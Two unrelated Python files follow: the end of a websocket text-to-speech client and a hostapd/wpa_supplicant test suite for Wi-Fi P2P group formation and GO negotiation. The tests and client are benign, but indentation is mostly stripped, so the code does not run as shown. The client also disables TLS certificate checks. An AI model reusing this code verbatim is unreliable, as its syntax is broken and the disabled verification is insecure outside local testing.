print("ws is closed")
ws.close()
else:
print("infer error")
except Exception as e:
print("receive msg,but parse exception:", e)
# Handle websocket errors
def on_error(ws, error):
print("### error:", error)
# Handle websocket close
def on_close(ws):
print("### closed ###")
# Handle websocket connection established
def on_open(ws):
def run(*args):
global st
text_base64 = str(
base64.b64encode((wsParam.text).encode('utf-8')), "UTF8")
d = {"text": text_base64}
d = json.dumps(d)
print("Start sending text data")
st = time.time()
ws.send(d)
thread.start_new_thread(run, ())
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--text",
type=str,
help="A sentence to be synthesized",
default="您好,欢迎使用语音合成服务。")
parser.add_argument(
"--server", type=str, help="server ip", default="127.0.0.1")
parser.add_argument("--port", type=int, help="server port", default=8092)
args = parser.parse_args()
print("***************************************")
print("Server ip: ", args.server)
print("Server port: ", args.port)
print("Sentence to be synthesized: ", args.text)
print("***************************************")
wsParam = WsParam(text=args.text, server=args.server, port=args.port)
websocket.enableTrace(False)
wsUrl = wsParam.create_url()
ws = websocket.WebSocketApp(
wsUrl, on_message=on_message, on_error=on_error, on_close=on_close)
ws.on_open = on_open
ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE})
t.join()
print("End of playing audio")
stream.stop_stream()
stream.close()
p.terminate()
|
test_p2p_grpform.py
|
# P2P group formation test cases
# Copyright (c) 2013-2014, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import logging
logger = logging.getLogger()
import time
import threading
import Queue
import os
import hostapd
import hwsim_utils
import utils
from utils import HwsimSkip
from wpasupplicant import WpaSupplicant
def check_grpform_results(i_res, r_res):
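    """Verify that the initiator and responder results describe the same successfully formed group."""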
if i_res['result'] != 'success' or r_res['result'] != 'success':
raise Exception("Failed group formation")
if i_res['ssid'] != r_res['ssid']:
raise Exception("SSID mismatch")
if i_res['freq'] != r_res['freq']:
raise Exception("freq mismatch")
if 'go_neg_freq' in r_res and i_res['go_neg_freq'] != r_res['go_neg_freq']:
raise Exception("go_neg_freq mismatch")
if i_res['freq'] != i_res['go_neg_freq']:
raise Exception("freq/go_neg_freq mismatch")
if i_res['role'] != i_res['go_neg_role']:
raise Exception("role/go_neg_role mismatch")
if 'go_neg_role' in r_res and r_res['role'] != r_res['go_neg_role']:
raise Exception("role/go_neg_role mismatch")
if i_res['go_dev_addr'] != r_res['go_dev_addr']:
raise Exception("GO Device Address mismatch")
def go_neg_init(i_dev, r_dev, pin, i_method, i_intent, res):
logger.debug("Initiate GO Negotiation from i_dev")
try:
i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), pin, i_method, timeout=20, go_intent=i_intent)
logger.debug("i_res: " + str(i_res))
    except Exception as e:
i_res = None
logger.info("go_neg_init thread caught an exception from p2p_go_neg_init: " + str(e))
res.put(i_res)
def go_neg_pin(i_dev, r_dev, i_intent=None, r_intent=None, i_method='enter', r_method='display'):
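    """Run PIN-based GO Negotiation: initiate from i_dev in a background thread, wait for the
    GO Negotiation Request on r_dev, re-initiate from r_dev, and verify P2P connectivity."""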
r_dev.p2p_listen()
i_dev.p2p_listen()
pin = r_dev.wps_read_pin()
logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
r_dev.dump_monitor()
res = Queue.Queue()
t = threading.Thread(target=go_neg_init, args=(i_dev, r_dev, pin, i_method, i_intent, res))
t.start()
logger.debug("Wait for GO Negotiation Request on r_dev")
ev = r_dev.wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=15)
if ev is None:
raise Exception("GO Negotiation timed out")
r_dev.dump_monitor()
logger.debug("Re-initiate GO Negotiation from r_dev")
r_res = r_dev.p2p_go_neg_init(i_dev.p2p_dev_addr(), pin, r_method, go_intent=r_intent, timeout=20)
logger.debug("r_res: " + str(r_res))
r_dev.dump_monitor()
t.join()
i_res = res.get()
if i_res is None:
raise Exception("go_neg_init thread failed")
logger.debug("i_res: " + str(i_res))
logger.info("Group formed")
hwsim_utils.test_connectivity_p2p(r_dev, i_dev)
i_dev.dump_monitor()
return [i_res, r_res]
def go_neg_pin_authorized(i_dev, r_dev, i_intent=None, r_intent=None, expect_failure=False, i_go_neg_status=None, i_method='enter', r_method='display', test_data=True, i_freq=None, r_freq=None):
i_dev.p2p_listen()
pin = r_dev.wps_read_pin()
logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
r_dev.p2p_go_neg_auth(i_dev.p2p_dev_addr(), pin, r_method, go_intent=r_intent, freq=r_freq)
r_dev.p2p_listen()
i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), pin, i_method, timeout=20, go_intent=i_intent, expect_failure=expect_failure, freq=i_freq)
r_res = r_dev.p2p_go_neg_auth_result(expect_failure=expect_failure)
logger.debug("i_res: " + str(i_res))
logger.debug("r_res: " + str(r_res))
r_dev.dump_monitor()
i_dev.dump_monitor()
if i_go_neg_status:
if i_res['result'] != 'go-neg-failed':
raise Exception("Expected GO Negotiation failure not reported")
if i_res['status'] != i_go_neg_status:
raise Exception("Expected GO Negotiation status not seen")
if expect_failure:
return
logger.info("Group formed")
if test_data:
hwsim_utils.test_connectivity_p2p(r_dev, i_dev)
return [i_res, r_res]
def go_neg_init_pbc(i_dev, r_dev, i_intent, res, freq, provdisc):
logger.debug("Initiate GO Negotiation from i_dev")
try:
i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), None, "pbc",
timeout=20, go_intent=i_intent, freq=freq,
provdisc=provdisc)
logger.debug("i_res: " + str(i_res))
    except Exception as e:
i_res = None
logger.info("go_neg_init_pbc thread caught an exception from p2p_go_neg_init: " + str(e))
res.put(i_res)
def go_neg_pbc(i_dev, r_dev, i_intent=None, r_intent=None, i_freq=None, r_freq=None, provdisc=False, r_listen=False):
if r_listen:
r_dev.p2p_listen()
else:
r_dev.p2p_find(social=True)
i_dev.p2p_find(social=True)
logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
r_dev.dump_monitor()
res = Queue.Queue()
t = threading.Thread(target=go_neg_init_pbc, args=(i_dev, r_dev, i_intent, res, i_freq, provdisc))
t.start()
logger.debug("Wait for GO Negotiation Request on r_dev")
ev = r_dev.wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=15)
if ev is None:
raise Exception("GO Negotiation timed out")
r_dev.dump_monitor()
    # Allow some time for the GO Neg Resp to go out before initiating a new
    # GO Negotiation.
time.sleep(0.2)
logger.debug("Re-initiate GO Negotiation from r_dev")
r_res = r_dev.p2p_go_neg_init(i_dev.p2p_dev_addr(), None, "pbc",
go_intent=r_intent, timeout=20, freq=r_freq)
logger.debug("r_res: " + str(r_res))
r_dev.dump_monitor()
t.join()
i_res = res.get()
if i_res is None:
raise Exception("go_neg_init_pbc thread failed")
logger.debug("i_res: " + str(i_res))
logger.info("Group formed")
hwsim_utils.test_connectivity_p2p(r_dev, i_dev)
i_dev.dump_monitor()
return [i_res, r_res]
def go_neg_pbc_authorized(i_dev, r_dev, i_intent=None, r_intent=None,
expect_failure=False, i_freq=None, r_freq=None):
i_dev.p2p_listen()
logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
r_dev.p2p_go_neg_auth(i_dev.p2p_dev_addr(), None, "pbc",
go_intent=r_intent, freq=r_freq)
r_dev.p2p_listen()
i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), None, "pbc", timeout=20,
go_intent=i_intent,
expect_failure=expect_failure, freq=i_freq)
r_res = r_dev.p2p_go_neg_auth_result(expect_failure=expect_failure)
logger.debug("i_res: " + str(i_res))
logger.debug("r_res: " + str(r_res))
r_dev.dump_monitor()
i_dev.dump_monitor()
if expect_failure:
return
logger.info("Group formed")
return [i_res, r_res]
def remove_group(dev1, dev2):
dev1.remove_group()
try:
dev2.remove_group()
except:
pass
def test_grpform(dev):
"""P2P group formation using PIN and authorized connection (init -> GO)"""
try:
dev[0].global_request("SET p2p_group_idle 2")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0)
check_grpform_results(i_res, r_res)
dev[1].remove_group()
ev = dev[0].wait_global_event(["P2P-GROUP-REMOVED"], timeout=10)
if ev is None:
raise Exception("GO did not remove group on idle timeout")
if "GO reason=IDLE" not in ev:
raise Exception("Unexpected group removal event: " + ev)
finally:
dev[0].global_request("SET p2p_group_idle 0")
def test_grpform_a(dev):
"""P2P group formation using PIN and authorized connection (init -> GO) (init: group iface)"""
dev[0].global_request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0)
if "p2p-wlan" not in i_res['ifname']:
raise Exception("Unexpected group interface name")
check_grpform_results(i_res, r_res)
remove_group(dev[0], dev[1])
if i_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
def test_grpform_b(dev):
"""P2P group formation using PIN and authorized connection (init -> GO) (resp: group iface)"""
dev[1].global_request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0)
if "p2p-wlan" not in r_res['ifname']:
raise Exception("Unexpected group interface name")
check_grpform_results(i_res, r_res)
remove_group(dev[0], dev[1])
if r_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
def test_grpform_c(dev):
"""P2P group formation using PIN and authorized connection (init -> GO) (group iface)"""
dev[0].global_request("SET p2p_no_group_iface 0")
dev[1].global_request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0)
if "p2p-wlan" not in i_res['ifname']:
raise Exception("Unexpected group interface name")
if "p2p-wlan" not in r_res['ifname']:
raise Exception("Unexpected group interface name")
check_grpform_results(i_res, r_res)
remove_group(dev[0], dev[1])
if i_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
if r_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
def test_grpform2(dev):
"""P2P group formation using PIN and authorized connection (resp -> GO)"""
go_neg_pin_authorized(i_dev=dev[0], i_intent=0, r_dev=dev[1], r_intent=15)
remove_group(dev[0], dev[1])
def test_grpform2_c(dev):
"""P2P group formation using PIN and authorized connection (resp -> GO) (group iface)"""
dev[0].global_request("SET p2p_no_group_iface 0")
dev[1].global_request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0, r_dev=dev[1], r_intent=15)
remove_group(dev[0], dev[1])
if i_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
if r_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
def test_grpform3(dev):
"""P2P group formation using PIN and re-init GO Negotiation"""
go_neg_pin(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
remove_group(dev[0], dev[1])
def test_grpform3_c(dev):
"""P2P group formation using PIN and re-init GO Negotiation (group iface)"""
dev[0].global_request("SET p2p_no_group_iface 0")
dev[1].global_request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
remove_group(dev[0], dev[1])
if i_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
if r_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
def test_grpform4(dev):
"""P2P group formation response during p2p_find"""
addr1 = dev[1].p2p_dev_addr()
dev[1].p2p_listen()
dev[0].discover_peer(addr1)
dev[1].p2p_find(social=True)
time.sleep(0.4)
dev[0].global_request("P2P_CONNECT " + addr1 + " 12345670 display")
ev = dev[1].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=15)
if ev is None:
raise Exception("GO Negotiation RX timed out")
time.sleep(0.5)
dev[1].p2p_stop_find()
dev[0].p2p_stop_find()
def test_grpform_pbc(dev):
"""P2P group formation using PBC and re-init GO Negotiation"""
[i_res, r_res] = go_neg_pbc(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
check_grpform_results(i_res, r_res)
if i_res['role'] != 'GO' or r_res['role'] != 'client':
raise Exception("Unexpected device roles")
remove_group(dev[0], dev[1])
def test_grpform_pd(dev):
"""P2P group formation with PD-before-GO-Neg workaround"""
[i_res, r_res] = go_neg_pbc(i_dev=dev[0], provdisc=True, r_dev=dev[1], r_listen=True)
check_grpform_results(i_res, r_res)
remove_group(dev[0], dev[1])
def test_grpform_ext_listen(dev):
"""P2P group formation with extended listen timing enabled"""
addr0 = dev[0].p2p_dev_addr()
try:
if "FAIL" not in dev[0].global_request("P2P_EXT_LISTEN 100"):
raise Exception("Invalid P2P_EXT_LISTEN accepted")
if "OK" not in dev[0].global_request("P2P_EXT_LISTEN 300 1000"):
raise Exception("Failed to set extended listen timing")
if "OK" not in dev[1].global_request("P2P_EXT_LISTEN 200 40000"):
raise Exception("Failed to set extended listen timing")
[i_res, r_res] = go_neg_pbc(i_dev=dev[0], provdisc=True, r_dev=dev[1],
r_listen=True, i_freq="2417", r_freq="2417",
i_intent=1, r_intent=15)
check_grpform_results(i_res, r_res)
peer1 = dev[0].get_peer(dev[1].p2p_dev_addr())
if peer1['ext_listen_interval'] != "40000":
raise Exception("Extended listen interval not discovered correctly")
if peer1['ext_listen_period'] != "200":
raise Exception("Extended listen period not discovered correctly")
peer0 = dev[1].get_peer(dev[0].p2p_dev_addr())
if peer0['ext_listen_interval'] != "1000":
raise Exception("Extended listen interval not discovered correctly")
if peer0['ext_listen_period'] != "300":
raise Exception("Extended listen period not discovered correctly")
if not dev[2].discover_peer(addr0):
raise Exception("Could not discover peer during ext listen")
remove_group(dev[0], dev[1])
finally:
if "OK" not in dev[0].global_request("P2P_EXT_LISTEN"):
raise Exception("Failed to clear extended listen timing")
if "OK" not in dev[1].global_request("P2P_EXT_LISTEN"):
raise Exception("Failed to clear extended listen timing")
def test_grpform_ext_listen_oper(dev):
"""P2P extended listen timing operations"""
try:
_test_grpform_ext_listen_oper(dev)
finally:
dev[0].global_request("P2P_EXT_LISTEN")
def _test_grpform_ext_listen_oper(dev):
addr0 = dev[0].p2p_dev_addr()
dev[0].global_request("SET p2p_no_group_iface 0")
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5")
addr1 = wpas.p2p_dev_addr()
wpas.request("P2P_SET listen_channel 1")
wpas.global_request("SET p2p_no_group_iface 0")
wpas.request("P2P_LISTEN")
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
dev[0].request("P2P_LISTEN")
if not wpas.discover_peer(addr0):
raise Exception("Could not discover peer (2)")
dev[0].global_request("P2P_EXT_LISTEN 300 500")
dev[0].global_request("P2P_CONNECT " + addr1 + " 12345670 display auth go_intent=0 freq=2417")
wpas.global_request("P2P_CONNECT " + addr0 + " 12345670 enter go_intent=15 freq=2417")
ev = dev[0].wait_global_event(["P2P-GO-NEG-SUCCESS"], timeout=15)
if ev is None:
raise Exception("GO Negotiation failed")
ifaces = wpas.request("INTERFACES").splitlines()
iface = ifaces[0] if "p2p-wlan" in ifaces[0] else ifaces[1]
wpas.group_ifname = iface
if "OK" not in wpas.group_request("STOP_AP"):
raise Exception("STOP_AP failed")
wpas.group_request("SET ext_mgmt_frame_handling 1")
dev[1].p2p_find(social=True)
time.sleep(1)
if dev[1].peer_known(addr0):
raise Exception("Unexpected peer discovery")
ifaces = dev[0].request("INTERFACES").splitlines()
iface = ifaces[0] if "p2p-wlan" in ifaces[0] else ifaces[1]
if "OK" not in dev[0].global_request("P2P_GROUP_REMOVE " + iface):
raise Exception("Failed to request group removal")
wpas.remove_group()
count = 0
timeout = 15
found = False
while count < timeout * 4:
time.sleep(0.25)
count = count + 1
if dev[1].peer_known(addr0):
found = True
break
dev[1].p2p_stop_find()
if not found:
raise Exception("Could not discover peer that was supposed to use extended listen")
def test_both_go_intent_15(dev):
"""P2P GO Negotiation with both devices using GO intent 15"""
go_neg_pin_authorized(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=15, expect_failure=True, i_go_neg_status=9)
def test_both_go_neg_display(dev):
"""P2P GO Negotiation with both devices trying to display PIN"""
go_neg_pin_authorized(i_dev=dev[0], r_dev=dev[1], expect_failure=True, i_go_neg_status=10, i_method='display', r_method='display')
def test_both_go_neg_enter(dev):
"""P2P GO Negotiation with both devices trying to enter PIN"""
go_neg_pin_authorized(i_dev=dev[0], r_dev=dev[1], expect_failure=True, i_go_neg_status=10, i_method='enter', r_method='enter')
def test_go_neg_pbc_vs_pin(dev):
"""P2P GO Negotiation with one device using PBC and the other PIN"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[1].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
dev[0].p2p_listen()
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " pbc auth"):
raise Exception("Failed to authorize GO Neg")
if not dev[1].discover_peer(addr0):
raise Exception("Could not discover peer")
if "OK" not in dev[1].request("P2P_CONNECT " + addr0 + " 12345670 display"):
raise Exception("Failed to initiate GO Neg")
ev = dev[1].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("GO Negotiation failure timed out")
if "status=10" not in ev:
raise Exception("Unexpected failure reason: " + ev)
def test_go_neg_pin_vs_pbc(dev):
"""P2P GO Negotiation with one device using PIN and the other PBC"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[1].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
dev[0].p2p_listen()
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " 12345670 display auth"):
raise Exception("Failed to authorize GO Neg")
if not dev[1].discover_peer(addr0):
raise Exception("Could not discover peer")
if "OK" not in dev[1].request("P2P_CONNECT " + addr0 + " pbc"):
raise Exception("Failed to initiate GO Neg")
ev = dev[1].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("GO Negotiation failure timed out")
if "status=10" not in ev:
raise Exception("Unexpected failure reason: " + ev)
def test_grpform_per_sta_psk(dev):
"""P2P group formation with per-STA PSKs"""
dev[0].global_request("P2P_SET per_sta_psk 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
check_grpform_results(i_res, r_res)
pin = dev[2].wps_read_pin()
dev[0].p2p_go_authorize_client(pin)
c_res = dev[2].p2p_connect_group(dev[0].p2p_dev_addr(), pin, timeout=60)
check_grpform_results(i_res, c_res)
if r_res['psk'] == c_res['psk']:
raise Exception("Same PSK assigned for both clients")
hwsim_utils.test_connectivity_p2p(dev[1], dev[2])
dev[0].remove_group()
dev[1].wait_go_ending_session()
dev[2].wait_go_ending_session()
def test_grpform_per_sta_psk_wps(dev):
"""P2P group formation with per-STA PSKs with non-P2P WPS STA"""
dev[0].global_request("P2P_SET per_sta_psk 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
check_grpform_results(i_res, r_res)
dev[0].p2p_go_authorize_client_pbc()
dev[2].request("WPS_PBC")
dev[2].wait_connected(timeout=30)
hwsim_utils.test_connectivity_p2p_sta(dev[1], dev[2])
dev[0].remove_group()
dev[2].request("DISCONNECT")
dev[1].wait_go_ending_session()
def test_grpform_force_chan_go(dev):
"""P2P group formation forced channel selection by GO"""
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
i_freq=2432,
r_dev=dev[1], r_intent=0,
test_data=False)
check_grpform_results(i_res, r_res)
if i_res['freq'] != "2432":
raise Exception("Unexpected channel - did not follow GO's forced channel")
remove_group(dev[0], dev[1])
def test_grpform_force_chan_cli(dev):
"""P2P group formation forced channel selection by client"""
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
i_freq=2417,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if i_res['freq'] != "2417":
raise Exception("Unexpected channel - did not follow GO's forced channel")
remove_group(dev[0], dev[1])
def test_grpform_force_chan_conflict(dev):
"""P2P group formation fails due to forced channel mismatch"""
go_neg_pin_authorized(i_dev=dev[0], i_intent=0, i_freq=2422,
r_dev=dev[1], r_intent=15, r_freq=2427,
expect_failure=True, i_go_neg_status=7)
def test_grpform_pref_chan_go(dev):
"""P2P group formation preferred channel selection by GO"""
dev[0].request("SET p2p_pref_chan 81:7")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0,
test_data=False)
check_grpform_results(i_res, r_res)
if i_res['freq'] != "2442":
raise Exception("Unexpected channel - did not follow GO's p2p_pref_chan")
remove_group(dev[0], dev[1])
def test_grpform_pref_chan_go_overridden(dev):
"""P2P group formation preferred channel selection by GO overridden by client"""
dev[1].request("SET p2p_pref_chan 81:7")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
i_freq=2422,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if i_res['freq'] != "2422":
raise Exception("Unexpected channel - did not follow client's forced channel")
remove_group(dev[0], dev[1])
def test_grpform_no_go_freq_forcing_chan(dev):
"""P2P group formation with no-GO freq forcing channel"""
dev[1].request("SET p2p_no_go_freq 100-200,300,4000-6000")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow no-GO freq")
remove_group(dev[0], dev[1])
def test_grpform_no_go_freq_conflict(dev):
"""P2P group formation fails due to no-GO range forced by client"""
dev[1].request("SET p2p_no_go_freq 2000-3000")
go_neg_pin_authorized(i_dev=dev[0], i_intent=0, i_freq=2422,
r_dev=dev[1], r_intent=15,
expect_failure=True, i_go_neg_status=7)
def test_grpform_no_5ghz_world_roaming(dev):
"""P2P group formation with world roaming regulatory"""
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_no_5ghz_add_cli(dev):
"""P2P group formation with passive scan 5 GHz and p2p_add_cli_chan=1"""
dev[0].request("SET p2p_add_cli_chan 1")
dev[1].request("SET p2p_add_cli_chan 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
r_dev=dev[1], r_intent=14,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_no_5ghz_add_cli2(dev):
"""P2P group formation with passive scan 5 GHz and p2p_add_cli_chan=1 (reverse)"""
dev[0].request("SET p2p_add_cli_chan 1")
dev[1].request("SET p2p_add_cli_chan 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=14,
r_dev=dev[1], r_intent=0,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_no_5ghz_add_cli3(dev):
"""P2P group formation with passive scan 5 GHz and p2p_add_cli_chan=1 (intent 15)"""
dev[0].request("SET p2p_add_cli_chan 1")
dev[1].request("SET p2p_add_cli_chan 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_no_5ghz_add_cli4(dev):
"""P2P group formation with passive scan 5 GHz and p2p_add_cli_chan=1 (reverse; intent 15)"""
dev[0].request("SET p2p_add_cli_chan 1")
dev[1].request("SET p2p_add_cli_chan 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_incorrect_pin(dev):
"""P2P GO Negotiation with incorrect PIN"""
dev[1].p2p_listen()
addr1 = dev[1].p2p_dev_addr()
if not dev[0].discover_peer(addr1):
raise Exception("Peer not found")
res = dev[1].global_request("P2P_CONNECT " + dev[0].p2p_dev_addr() + " pin auth go_intent=0")
if "FAIL" in res:
raise Exception("P2P_CONNECT failed to generate PIN")
logger.info("PIN from P2P_CONNECT: " + res)
dev[0].global_request("P2P_CONNECT " + addr1 + " 00000000 enter go_intent=15")
ev = dev[0].wait_global_event(["P2P-GO-NEG-SUCCESS"], timeout=15)
if ev is None:
raise Exception("GO Negotiation did not complete successfully(0)")
ev = dev[1].wait_global_event(["P2P-GO-NEG-SUCCESS"], timeout=15)
if ev is None:
raise Exception("GO Negotiation did not complete successfully(1)")
ev = dev[1].wait_global_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS failure not reported(1)")
if "msg=8 config_error=18" not in ev:
raise Exception("Unexpected WPS failure(1): " + ev)
ev = dev[0].wait_global_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS failure not reported")
if "msg=8 config_error=18" not in ev:
raise Exception("Unexpected WPS failure: " + ev)
ev = dev[1].wait_global_event(["P2P-GROUP-FORMATION-FAILURE"], timeout=10)
if ev is None:
raise Exception("Group formation failure timed out")
ev = dev[0].wait_global_event(["P2P-GROUP-FORMATION-FAILURE"], timeout=5)
if ev is None:
raise Exception("Group formation failure timed out")
def test_grpform_reject(dev):
"""User rejecting group formation attempt by a P2P peer"""
addr0 = dev[0].p2p_dev_addr()
dev[0].p2p_listen()
dev[1].p2p_go_neg_init(addr0, None, "pbc")
ev = dev[0].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=15)
if ev is None:
raise Exception("GO Negotiation timed out")
if "OK" in dev[0].global_request("P2P_REJECT foo"):
raise Exception("Invalid P2P_REJECT accepted")
if "FAIL" in dev[0].global_request("P2P_REJECT " + ev.split(' ')[1]):
raise Exception("P2P_REJECT failed")
dev[1].request("P2P_STOP_FIND")
dev[1].p2p_go_neg_init(addr0, None, "pbc")
ev = dev[1].wait_global_event(["GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("Rejection not reported")
if "status=11" not in ev:
raise Exception("Unexpected status code in rejection")
def test_grpform_pd_no_probe_resp(dev):
"""GO Negotiation after PD, but no Probe Response"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[0].p2p_listen()
if not dev[1].discover_peer(addr0):
raise Exception("Peer not found")
dev[1].p2p_stop_find()
dev[0].p2p_stop_find()
peer = dev[0].get_peer(addr1)
if peer['listen_freq'] == '0':
raise Exception("Peer listen frequency not learned from Probe Request")
time.sleep(0.3)
dev[0].request("P2P_FLUSH")
dev[0].p2p_listen()
dev[1].global_request("P2P_PROV_DISC " + addr0 + " display")
ev = dev[0].wait_global_event(["P2P-PROV-DISC-SHOW-PIN"], timeout=5)
if ev is None:
raise Exception("PD Request timed out")
ev = dev[1].wait_global_event(["P2P-PROV-DISC-ENTER-PIN"], timeout=5)
if ev is None:
raise Exception("PD Response timed out")
peer = dev[0].get_peer(addr1)
if peer['listen_freq'] != '0':
raise Exception("Peer listen frequency learned unexpectedly from PD Request")
pin = dev[0].wps_read_pin()
if "FAIL" in dev[1].global_request("P2P_CONNECT " + addr0 + " " + pin + " enter"):
raise Exception("P2P_CONNECT on initiator failed")
ev = dev[0].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=5)
if ev is None:
raise Exception("GO Negotiation start timed out")
peer = dev[0].get_peer(addr1)
if peer['listen_freq'] == '0':
raise Exception("Peer listen frequency not learned from PD followed by GO Neg Req")
if "FAIL" in dev[0].global_request("P2P_CONNECT " + addr1 + " " + pin + " display"):
raise Exception("P2P_CONNECT on responder failed")
ev = dev[0].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out")
ev = dev[1].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out")
def test_go_neg_two_peers(dev):
"""P2P GO Negotiation rejected due to already started negotiation with another peer"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
addr2 = dev[2].p2p_dev_addr()
dev[1].p2p_listen()
dev[2].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
if not dev[0].discover_peer(addr2):
raise Exception("Could not discover peer")
if "OK" not in dev[0].request("P2P_CONNECT " + addr2 + " pbc auth"):
raise Exception("Failed to authorize GO Neg")
dev[0].p2p_listen()
if not dev[2].discover_peer(addr0):
raise Exception("Could not discover peer")
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " pbc"):
raise Exception("Failed to initiate GO Neg")
ev = dev[1].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=5)
if ev is None:
raise Exception("timeout on GO Neg RX event")
dev[2].request("P2P_CONNECT " + addr0 + " pbc")
ev = dev[2].wait_global_event(["GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("Rejection not reported")
if "status=5" not in ev:
raise Exception("Unexpected status code in rejection: " + ev)
def clear_pbc_overlap(dev, ifname):
hapd_global = hostapd.HostapdGlobal()
hapd_global.remove(ifname)
dev[0].request("P2P_CANCEL")
